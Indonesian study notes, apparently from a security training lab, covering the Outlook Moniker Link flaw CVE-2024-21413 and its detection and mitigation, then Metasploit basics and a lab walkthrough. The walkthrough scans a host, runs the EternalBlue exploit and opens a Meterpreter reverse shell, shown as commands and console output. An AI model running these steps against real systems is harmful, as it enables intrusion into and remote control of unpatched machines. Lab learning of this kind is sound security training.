Pada 13 Februari 2024, Microsoft mengumumkan kerentanan kritis pada Microsoft Outlook dengan CVE CVE-2024-21413, yang ditemukan oleh Haifei Li (Check Point Research).
Kerentanan ini memanfaatkan Moniker Link, yaitu jenis hyperlink khusus yang dapat melewati mekanisme keamanan Outlook (Protected View). Jika korban mengklik link berbahaya dalam email, Outlook dapat:
Outlook dapat merender email dalam format HTML dan mendukung berbagai jenis hyperlink seperti HTTP/HTTPS. Selain itu, Outlook juga bisa membuka URL khusus yang memanggil aplikasi di Windows, yang disebut Moniker Links.
Credential Leak:
Windows mengirim hash netNTLMv2 korban ke penyerang
Remote Code Execution (RCE):
Dimungkinkan karena Moniker Links memanfaatkan Windows COM (Component Object Model)
→ Namun saat ini belum ada PoC publik untuk RCE pada CVE ini
Penyerang mengirim email HTML berisi Moniker Link berbahaya yang membypass Outlook Protected View, sehingga saat korban mengklik link tersebut, Outlook mencoba mengakses SMB ke mesin penyerang dan mengirim hash netNTLMv2 korban.
Sebuah rule YARA dibuat oleh Florian Roth untuk mendeteksi email berbahaya yang mengeksploitasi CVE-2024-21413 pada Microsoft Outlook. Rule ini fokus mendeteksi Moniker Link yang mengandung path file:\\, yang dapat memicu Remote Code Execution (RCE).
Rule YARA tersebut:
Mencari struktur email valid (Subject, Received)
Mendeteksi URL file:///\\ yang mengarah ke berbagai tipe file berbahaya
Membatasi ukuran file agar sesuai dengan karakteristik email
Digunakan untuk mendeteksi email eksploit sebelum dijalankan
Selain itu, melalui Wireshark, terlihat request SMB dari korban ke attacker, yang mengandung hash NetNTLMv2 (terpotong). Ini menunjukkan bahwa eksploit dapat menyebabkan kebocoran kredensial Windows melalui autentikasi SMB.
Microsoft telah menyertakan patch keamanan untuk mengatasi kerentanan ini dalam rilis Patch Tuesday bulan Februari. Daftar KB (Knowledge Base) sesuai build Office dapat dilihat pada referensi resmi Microsoft. Oleh karena itu, memperbarui Office melalui Windows Update atau Microsoft Update Catalog sangat disarankan.
Selain itu, sambil menunggu atau sebagai langkah pencegahan tambahan, penting untuk terus menerapkan praktik keamanan siber yang aman, seperti:
Tidak mengklik tautan sembarangan, terutama dari email yang tidak diminta
Melakukan preview tautan sebelum mengkliknya
Meneruskan email mencurigakan ke tim atau departemen keamanan siber terkait
Karena kerentanan ini melewati fitur Protected View pada Outlook, tidak ada konfigurasi Outlook yang dapat sepenuhnya mencegah serangan ini. Selain itu, memblokir protokol SMB secara total juga tidak disarankan karena SMB sangat penting untuk akses network share.
Namun demikian, pemblokiran di tingkat firewall mungkin dapat dilakukan, tergantung pada kebijakan dan kebutuhan masing-masing organisasi.
Saat menggunakan Metasploit Framework, kamu akan paling sering berinteraksi dengan Metasploit Console. Konsol ini dapat dijalankan melalui terminal AttackBox dengan perintah: msfconsole
Metasploit Console merupakan antarmuka utama untuk bekerja dengan berbagai modul yang tersedia di dalam Metasploit Framework.
Metasploit menyediakan berbagai kategori modul yang dapat diakses melalui msfconsole. Modul-modul ini digunakan sesuai kebutuhan, baik untuk eksploitasi, pemindaian, maupun pengujian keamanan lainnya.
NOPs (No Operation) adalah instruksi yang tidak melakukan apa pun.
Pada arsitektur CPU Intel x86, NOP direpresentasikan dengan kode 0x90, yang membuat CPU tidak melakukan operasi selama satu siklus.
Menjalankan satu perintah saja sudah penting, tetapi koneksi interaktif jauh lebih berguna.
Koneksi ini disebut shell, yaitu antarmuka command line yang memungkinkan kita mengetik perintah dan menjalankannya langsung di sistem target.
Metasploit menyediakan berbagai payload yang dapat membuka shell pada target, sehingga penyerang dapat berinteraksi dengan sistem secara langsung.
Di dalam direktori payloads, terdapat empat subdirektori utama, yaitu: adapters, singles, stagers, dan stages.
Siap, ini lanjutan catatan yang sudah dirapikan dalam bahasa Indonesia dan mudah dipahami:
How would you search for a module related to Apache?
search apache
search type:auxiliary sshinfo auxiliary/scanner/ssh/ssh_login# Name: SSH Login Check Scanner# Module: auxiliary/scanner/ssh/ssh_login# License: Metasploit Framework License (BSD)# Rank: Normal# Provided by:# todb <todb@metasploit.com># Check supported:# No# Basic options:# Name Current Setting Required Description# ---- --------------- -------- -----------# ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password# BLANK_PASSWORDS false no Try blank passwords for all users# BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5# CreateSession true no Create a new session for every successful login# DB_ALL_CREDS false no Try each user/password couple stored in the current database# DB_ALL_PASS false no Add all passwords in the current database to the list# DB_ALL_USERS false no Add all users in the current database to the list# DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted# : none, user, user&realm)# PASSWORD no A specific password to authenticate with# PASS_FILE no File containing passwords, one per line# RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-met# asploit/basics/using-metasploit.html# RPORT 22 yes The target port# STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host# THREADS 1 yes The number of concurrent threads (max one per host)# USERNAME no A specific username to authenticate as# USERPASS_FILE no File containing users and passwords separated by space, one pair p# er line# USER_AS_PASS false no Try the username as the password for all users# USER_FILE no File containing usernames, one per line# VERBOSE false yes Whether to print output for all attempts# Description:# This module will test ssh logins on a range of machines and# report successful logins. If you have loaded a database plugin# and connected to a database this module will record successful# logins and hosts so you can track your access.# References:# https://nvd.nist.gov/vuln/detail/CVE-1999-0502# View the full module info with the info -d command.
Who provided the auxiliary/scanner/ssh/ssh_login module?
nmap -sV -T4 10.48.128.125# Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-13 08:48 EST# PORT STATE SERVICE VERSION# 135/tcp open msrpc Microsoft Windows RPC# 139/tcp open netbios-ssn Microsoft Windows netbios-ssn# 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)# 1065/tcp filtered syscomlan# 3389/tcp open tcpwrapped# 49152/tcp open msrpc Microsoft Windows RPC# 49153/tcp open msrpc Microsoft Windows RPC# 49154/tcp open msrpc Microsoft Windows RPC# 49158/tcp open msrpc Microsoft Windows RPC# 49159/tcp open msrpc Microsoft Windows RPC# Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsip add show tun0# 10: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1380 qdisc fq_codel state UNKNOWN group default qlen 500 # link/none # inet 192.168.146.209/17 scope global tun0
kita coba jalankan Metasploit
msfconsolesearch Microsoft Windows 7 - 10search ms17-010use exploit/windows/smb/ms17_010_eternalblueshow options# Module options (exploit/windows/smb/ms17_010_eternalblue):# Name Current Setting Required Description# ---- --------------- -------- -----------# RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metas# ploit/basics/using-metasploit.html# RPORT 445 yes The target port (TCP)# SMBDomain no (Optional) The Windows domain to use for authentication. Only affect# s Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 tar# get machines.# SMBPass no (Optional) The password for the specified username# SMBUser no (Optional) The username to authenticate as# VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Wi# ndows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target# machines.# VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Serv# er 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.# Payload options (windows/x64/meterpreter/reverse_tcp):# Name Current Setting Required Description# ---- --------------- -------- -----------# EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)# LHOST 10.0.2.15 yes The listen address (an interface may be specified)# LPORT 4444 yes The listen portset RHOSTS 10.48.128.125set LHOST 192.168.146.209set LHOST 10.48.128.125# set SMBDomain .exploit# [*] Started reverse TCP handler on 10.48.90.84:4444# [*] 10.48.128.125:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check# [+] 10.48.128.125:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)# [*] 10.48.128.125:445 - Scanned 1 of 1 hosts (100% complete)# [+] 10.48.128.125:445 - The target is vulnerable.# [*] 10.48.128.125:445 - Connecting to target for exploitation.# [+] 10.48.128.125:445 - Connection established for exploitation.# [+] 10.48.128.125:445 - Target OS selected valid for OS indicated by SMB reply# [*] 10.48.128.125:445 - CORE raw buffer dump (42 bytes)# [*] 10.48.128.125:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes# [*] 10.48.128.125:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv# [*] 10.48.128.125:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1# [+] 10.48.128.125:445 - Target arch selected valid for arch indicated by DCE/RPC reply# [*] 10.48.128.125:445 - Trying exploit with 12 Groom Allocations.# [*] 10.48.128.125:445 - Sending all but last fragment of exploit packet# [*] 10.48.128.125:445 - Starting non-paged pool grooming# [+] 10.48.128.125:445 - Sending SMBv2 buffers# [+] 10.48.128.125:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.# [*] 10.48.128.125:445 - Sending final SMBv2 buffers.# [*] 10.48.128.125:445 - Sending last fragment of exploit packet!# [*] 10.48.128.125:445 - Receiving response from exploit packet# [+] 10.48.128.125:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!# [*] 10.48.128.125:445 - Sending egg to corrupted connection.# [*] 10.48.128.125:445 - Triggering free of corrupted buffer.# [*] Sending stage (203846 bytes) to 10.48.128.125# [*] Meterpreter session 1 opened (10.48.90.84:4444 -> 10.48.128.125:49269) at 2026-01-13 14:18:59 +0000# [+] 10.48.128.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# [+] 10.48.128.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# [+] 10.48.128.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# meterpreter >